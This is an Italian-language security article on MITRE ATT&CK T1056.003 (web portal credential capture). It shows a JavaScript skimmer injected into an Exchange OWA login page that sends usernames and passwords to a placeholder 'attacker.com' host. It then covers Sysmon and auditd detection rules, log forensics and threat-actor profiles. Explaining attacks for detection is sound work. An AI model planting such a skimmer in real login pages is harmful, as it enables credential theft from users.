Cattura Credenziali dai Portali Web: Input Capture: Web Portal Capture (T1056.003)

Per testare la resilienza dei portali web aziendali, è fondamentale comprendere come gli attaccanti modificano le pagine di login. Il processo inizia tipicamente con l'accesso amministrativo al web server, ottenuto tramite exploit o credenziali compromesse.

Su un server IIS con Outlook Web Access, puoi iniettare codice JavaScript nella pagina di login principale:

notepad C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\logon.aspx

L'inserimento di uno script di cattura avviene prima del tag di chiusura del form:

<script>
document.getElementById('loginForm').addEventListener('submit', function() {
    var usr = document.getElementById('username').value;
    var pwd = document.getElementById('password').value;
    fetch('http://attacker.com/log', {method: 'POST', body: JSON.stringify({u:usr, p:pwd})});
});
</script>

Per ambienti Linux con portali VPN basati su Apache, la modifica target è spesso il file PHP di autenticazione:

vi /var/www/html/vpn/login.php

Il codice di intercettazione può essere inserito all'inizio della funzione di validazione credenziali, registrando i dati prima del controllo effettivo. IceApple utilizza proprio questa strategia per monitorare le richieste di autenticazione OWA.

La simulazione in laboratorio dovrebbe includere anche l'implementazione di web shell come WARPWIRE, che può catturare credenziali durante il processo di login web per accedere a servizi layer 7 come RDP. Questo approccio multi-livello riflette le tattiche osservate nella campagna Cutting Edge, dove gli attaccanti hanno modificato il JavaScript delle pagine di login Ivanti Connect Secure.

La detection efficace richiede il monitoraggio di modifiche non autorizzate ai file critici dei portali web. Su sistemi Windows con IIS, configura Sysmon per tracciare le modifiche ai file nelle directory web root.

L'Event ID 11 di Sysmon cattura la creazione di file, mentre l'Event ID 2 monitora le modifiche temporali:

<FileCreate onmatch="include">
    <TargetFilename condition="contains">C:\inetpub\wwwroot\</TargetFilename>
    <TargetFilename condition="contains">logon.aspx</TargetFilename>
</FileCreate>

Per ambienti Linux, auditd fornisce visibilità sulle modifiche ai file di login. Configura regole specifiche per i path critici:

auditctl -w /var/www/html/login.php -p wa -k web_portal_modification

La correlazione temporale è fondamentale: modifiche ai file di login seguite immediatamente da connessioni di rete anomale indicano potenziale esfiltrazione di credenziali. I log IIS devono essere analizzati per richieste POST sospette verso domini esterni subito dopo autenticazioni riuscite.

Winter Vivern ha dimostrato come domini registrati ad hoc possano mimare portali governativi legittimi. Il monitoraggio DNS per domini simili (typosquatting) combinato con alert su modifiche ai file web crea una difesa multi-livello.

L'analisi comportamentale deve includere processi insoliti che modificano file web: notepad.exe o certutil.exe che accedono a directory IIS sono indicatori ad alta affidabilità. La campagna Triton Safety Instrumented System Attack ha mostrato come i redirect verso siti controllati dagli attaccanti richiedano modifiche minime ma rilevabili.

L'analisi forense di portali web compromessi richiede l'esame meticoloso di molteplici artefatti. Su sistemi Windows, il file system NTFS conserva timestamp cruciali nelle entry $MFT che rivelano quando i file web sono stati modificati.

Gli IIS log in *C:\inetpub\logs\LogFiles* contengono tracce delle richieste HTTP anomale. Cerca pattern di POST request verso domini esterni subito dopo login riusciti, indicatore tipico di esfiltrazione credenziali. La struttura del log IIS include user-agent, referrer e timing precisi per ricostruire l'attività.

L'esame del codice JavaScript iniettato richiede l'analisi differenziale dei file di backup. Tool come fc /b su Windows o diff su Linux evidenziano le modifiche precise. Cutting Edge ha dimostrato come modifiche minime al JavaScript possano catturare credenziali senza impattare la funzionalità apparente.

Per sistemi Linux, i log di Apache in /var/log/apache2/ forniscono visibilità sulle richieste web. L'analisi forense deve correlare modifiche ai file (tramite auditd) con attività di rete sospetta nei flow NSM. La timeline reconstruction beneficia dell'analisi dei processi che hanno modificato i file web, visibili tramite audit trail.

La persistenza del codice malevolo va verificata: controlli di integrità sui file web critici, analisi di scheduled task o cron job che potrebbero re-iniettare il codice, e verifica di web shell nascoste. WARPWIRE ha mostrato come la cattura credenziali possa essere integrata in framework più ampi di accesso remoto.

Winter Vivern rappresenta l'archetipo del gruppo che sfrutta la compromissione di portali web per operazioni di spionaggio. Il gruppo registra domini che mimano portali governativi legittimi, creando pagine di phishing indistinguibili dagli originali. La loro specializzazione nel targeting di entità governative dell'Europa dell'Est suggerisce motivazioni geopolitiche.

La campagna Cutting Edge (dicembre 2023 - febbraio 2024) ha rivelato l'evoluzione tattica di attori presumibilmente cinesi (UNC5221/UTA0178 e UNC5325). Il targeting multi-settoriale - difesa, telecomunicazioni, finanza, aerospace - indica capacità operative mature e obiettivi di intelligence economica diversificati.

L'uso di zero-day contro appliance Ivanti Connect Secure dimostra investimenti significativi in ricerca vulnerabilità. La combinazione con tecniche living-off-the-land e web shell custom suggerisce operatori esperti che prioritizzano la persistenza stealth.

Triton Safety Instrumented System Attack (giugno-agosto 2017) di TEMP.Veles ha mostrato come questa tecnica possa supportare operazioni di sabotaggio industriale. Il redirect di codici di login verso siti controllati indica pianificazione meticolosa e infrastruttura C2 dedicata.

I pattern geografici emergenti mostrano concentrazione su infrastrutture critiche e settore difesa. L'overlap nei tool - web shell sofisticate, framework modulari come IceApple - suggerisce condivisione di TTP tra gruppi o sviluppatori comuni. La tendenza verso l'exploitation di appliance VPN enterprise indica shift tattico verso accessi iniziali più affidabili.

Tecnica documentata nel framework MITRE ATT&CK. Analisi basata su campagne Cutting Edge e Triton Safety Instrumented System Attack. Detection strategies derivate da implementazioni real-world di FIM e SIEM correlation.